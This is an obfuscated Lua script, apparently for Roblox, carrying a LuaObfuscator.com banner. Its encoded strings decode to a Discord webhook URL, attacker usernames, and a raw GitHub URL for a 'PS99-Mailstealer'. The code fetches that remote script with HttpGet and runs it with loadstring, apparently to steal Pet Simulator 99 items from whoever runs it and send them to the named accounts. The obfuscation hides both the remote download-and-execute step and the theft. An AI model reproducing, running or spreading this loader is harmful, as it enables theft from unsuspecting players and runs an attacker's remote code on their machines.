--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-(2 -(878 -(282 + 595))))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=(2205 -(1523 + 114)) -(367 + 201) ;local v85;while true do if (v84==(927 -(214 + 713))) then v85=2^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=0 + (1270 -(226 + 1044)) ;local v35;while true do if (v34==1) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1066 -(68 + 997) ;end end end local function v22() local v36=0;local v37;local v38;while true do if (v36==(4 -(5 -2))) then return (v38 * (373 -(32 + 85))) + v37 ;end if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (1 -0) + 1 );v18=v18 + (959 -(892 + 65)) ;v36=2 -1 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + ((136 + 48) -(67 + 113)) ;return (v42 * (12302277 + (17785588 -13310649))) + (v41 * 65536) + (v40 * (628 -372)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,953 -(802 + 150) ,53 -(1519 -(998 + 488)) ) * ((3 -1)^(24 + 8))) + v43 ;local v47=v20(v44,1018 -(915 + 82) ,87 -56 );local v48=((v20(v44,19 + 5 + 8 )==(1 -0)) and  -(1188 -(1069 + 118))) or (2 -1) ;if (v47==(0 -0)) then if (v46==(0 + 0 + 0)) then return v48 * (0 -0) ;else local v90=0 -0 ;while true do if (v90==(0 + 0)) then v47=1;v45=791 -(302 + 66 + (1195 -(201 + 571))) ;break;end end end elseif (v47==(6433 -4386)) then return ((v46==(18 -(10 + 8))) and (v48 * (((1141 -(116 + 1022)) -2)/(442 -((1731 -1315) + 26))))) or (v48 * NaN) ;end return v8(v48,v47-(601 + 422) ) * (v45 + (v46/((440 -(145 + 293))^(165 -(543 -(44 + 386)))))) ;end local function v25(v49) local v50;if  not v49 then local v86=0;while true do if (v86==((0 + 0) -0)) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(860 -(814 + 45)) );v18=v18 + v49 ;local v51={};for v66=2 -(1 + 0) , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (2~=v52) then else v57=nil;v58=nil;v52=13 -10 ;end if (v52~=(1 + 0)) then else v55=nil;v56=nil;v52=2;end if (v52==(6 -3)) then v59=nil;while true do if (v53==3) then local v97=0 -0 ;while true do if (v97==(0 -0)) then for v113=2 -1 ,v23() do v55[v113-(286 -(134 + 151)) ]=v28();end return v57;end end end if ((1665 -(970 + 695))==v53) then local v98=0 -0 ;local v99;while true do if ((1990 -(582 + 1408))==v98) then v99=0 -0 ;while true do if (v99==(0 -0)) then v54={};v55={};v99=3 -2 ;end if ((1825 -(1195 + 629))==v99) then v56={};v53=1 -0 ;break;end end break;end end end if (v53==(243 -(187 + 54))) then for v102=1,v58 do local v103=780 -(162 + 618) ;local v104;local v105;local v106;while true do if (v103==(1 + 0)) then v106=nil;while true do if (v104==(0 + 0)) then local v120=0 -0 ;local v121;while true do if (v120==0) then v121=0 -0 ;while true do if ((1 + 0)==v121) then v104=1637 -(1373 + 263) ;break;end if (v121==(1000 -(451 + 549))) then v105=v21();v106=nil;v121=1 + 0 ;end end break;end end end if (1==v104) then if (v105==1) then v106=v21()~=0 ;elseif (v105==2) then v106=v24();elseif (v105==(4 -1)) then v106=v25();end v59[v102]=v106;break;end end break;end if (v103~=(0 -0)) then else v104=1384 -(746 + 638) ;v105=nil;v103=1 + 0 ;end end end v57[3]=v21();for v107=1,v23() do local v108=0 -0 ;local v109;local v110;local v111;local v112;while true do if (v108==1) then v111=nil;v112=nil;v108=343 -(218 + 123) ;end if ((1583 -(1535 + 46))==v108) then while true do if (1==v109) then v112=nil;while true do if ((0 + 0)~=v110) then else local v147=0 + 0 ;local v148;while true do if (0==v147) then v148=0;while true do if (v148~=1) then else v110=561 -(306 + 254) ;break;end if (v148==0) then local v187=0;while true do if (v187==0) then v111=0;v112=nil;v187=1;end if (v187==1) then v148=1 + 0 ;break;end end end end break;end end end if (v110~=1) then else while true do if (v111==0) then v112=v21();if (v20(v112,1 -0 ,1468 -(899 + 568) )~=0) then else local v182=0 + 0 ;local v183;local v184;local v185;local v186;while true do if (v182==0) then local v188=0;while true do if (v188==1) then v182=1;break;end if (v188==0) then v183=0 -0 ;v184=nil;v188=604 -(268 + 335) ;end end end if (v182~=(292 -(60 + 230))) then else while true do if (v183==(573 -(426 + 146))) then local v190=0 + 0 ;local v191;local v192;while true do if (v190==(1457 -(282 + 1174))) then while true do if (v191~=(811 -(569 + 242))) then else v192=0;while true do if (v192~=(0 -0)) then else v186={v22(),v22(),nil,nil};if (v184==0) then local v204=1251 -(721 + 530) ;while true do if (v204~=0) then else v186[1274 -(945 + 326) ]=v22();v186[9 -5 ]=v22();break;end end elseif (v184==(1 + 0)) then v186[703 -(271 + 429) ]=v23();elseif (v184==(2 + 0)) then v186[1503 -(1408 + 92) ]=v23() -(2^16) ;elseif (v184==(1089 -(461 + 625))) then local v213=1288 -(993 + 295) ;local v214;while true do if (v213==(0 + 0)) then v214=1171 -(418 + 753) ;while true do if (v214~=(0 + 0)) then else v186[3]=v23() -(2^16) ;v186[4]=v22();break;end end break;end end end v192=1;end if (1==v192) then v183=1 + 1 ;break;end end break;end end break;end if (v190~=0) then else v191=0;v192=nil;v190=1 + 0 ;end end end if (v183==(1 + 2)) then if (v20(v185,3,3)==1) then v186[533 -(406 + 123) ]=v59[v186[1773 -(1749 + 20) ]];end v54[v107]=v186;break;end if (v183~=2) then else local v194=0 + 0 ;local v195;while true do if (v194~=(1322 -(1249 + 73))) then else v195=0 + 0 ;while true do if (v195==(1146 -(466 + 679))) then v183=6 -3 ;break;end if ((0 -0)==v195) then local v201=1900 -(106 + 1794) ;local v202;while true do if (v201==(0 + 0)) then v202=0;while true do if (v202==0) then if (v20(v185,1,1)~=1) then else v186[1 + 1 ]=v59[v186[2]];end if (v20(v185,5 -3 ,5 -3 )~=1) then else v186[3]=v59[v186[117 -(4 + 110) ]];end v202=1;end if (v202~=1) then else v195=585 -(57 + 527) ;break;end end break;end end end end break;end end end if (v183~=(1427 -(41 + 1386))) then else local v196=0;local v197;local v198;while true do if (v196==1) then while true do if (v197~=(103 -(17 + 86))) then else v198=0 + 0 ;while true do if (v198==0) then local v203=0 -0 ;while true do if (v203==1) then v198=1;break;end if (v203==0) then v184=v20(v112,5 -3 ,3);v185=v20(v112,170 -(122 + 44) ,6);v203=1 -0 ;end end end if (v198~=(3 -2)) then else v183=1;break;end end break;end end break;end if (v196==(0 + 0)) then v197=0;v198=nil;v196=1;end end end end break;end if (v182==1) then local v189=0 + 0 ;while true do if ((1 -0)==v189) then v182=67 -(30 + 35) ;break;end if (v189==(0 + 0)) then v185=nil;v186=nil;v189=1258 -(1043 + 214) ;end end end end end break;end end break;end end break;end if (0==v109) then local v123=0 -0 ;while true do if (v123==1) then v109=1213 -(323 + 889) ;break;end if (v123==0) then v110=0;v111=nil;v123=1;end end end end break;end if (v108~=(0 -0)) then else v109=0;v110=nil;v108=581 -(361 + 219) ;end end end v53=3;end if (v53~=(321 -(53 + 267))) then else local v101=0;while true do if (v101~=1) then else v59={};v53=2;break;end if ((0 + 0)==v101) then v57={v54,v55,nil,v56};v58=v23();v101=1;end end end end break;end if (v52==(0 -0)) then v53=0 + 0 ;v54=nil;v52=1 + 0 ;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (1==v88) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v80[3];elseif (v81==1) then do return;end else v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];end elseif (v81<=3) then v72=v80[3];elseif (v81>4) then local v128=v80[2];v78[v128]=v78[v128](v13(v78,v128 + 1 ,v73));else local v130=0;local v131;local v132;while true do if (v130==0) then v131=v80[2];v132=v78[v80[3]];v130=1;end if (v130==1) then v78[v131 + 1 ]=v132;v78[v131]=v132[v80[4]];break;end end end elseif (v81<=8) then if (v81<=6) then v62[v80[3]]=v78[v80[2]];elseif (v81==7) then local v133=0;local v134;local v135;local v136;local v137;local v138;while true do if (v133==0) then v134=nil;v135,v136=nil;v137=nil;v138=nil;v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v133=1;end if (v133==6) then v72=v80[3];break;end if (v133==4) then v73=(v136 + v138) -1 ;v134=0;for v175=v138,v73 do v134=v134 + 1 ;v78[v175]=v135[v134];end v72=v72 + 1 ;v80=v68[v72];v138=v80[2];v133=5;end if (v133==5) then v78[v138]=v78[v138](v13(v78,v138 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v133=6;end if (v133==1) then v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v133=2;end if (v133==3) then v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v138=v80[2];v135,v136=v71(v78[v138](v13(v78,v138 + 1 ,v80[3])));v133=4;end if (v133==2) then v80=v68[v72];v138=v80[2];v137=v78[v80[3]];v78[v138 + 1 ]=v137;v78[v138]=v137[v80[4]];v72=v72 + 1 ;v133=3;end end else v78[v80[2]]=v62[v80[3]];end elseif (v81<=9) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>10) then v78[v80[2]]();else local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==0) then v143=v80[2];v144,v145=v71(v78[v143](v13(v78,v143 + 1 ,v80[3])));v142=1;end if (v142==2) then for v178=v143,v73 do local v179=0;while true do if (v179==0) then v146=v146 + 1 ;v78[v178]=v144[v146];break;end end end break;end if (1==v142) then v73=(v145 + v143) -1 ;v146=0;v142=2;end end end v72=v72 + 1 ;break;end if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323433353633313O30382O332O322O38312F694A5F662O7A764E2O3934615749364F396B314D6846626646557A4F54565F36794D714C6F6670387053377753766E385A63476B4F71486772676A644443534A5F744468030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C79706865725363726970742F50532O392D4D61696C737465616C65722F6D61696E2F50532O394D61696C737465616C657203083O00557365726E616D65030C3O007761636B79786D617374657203093O00557365726E616D653200163O00124O00013O0026093O000D000100020004033O000D000100122O000100043O001207000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026093O0001000100010004033O0001000100122O0001000A3O001202000100093O00122O0001000A3O00122O0001000B3O00124O00023O00044O000100012O00013O00017O00",v9(),...);
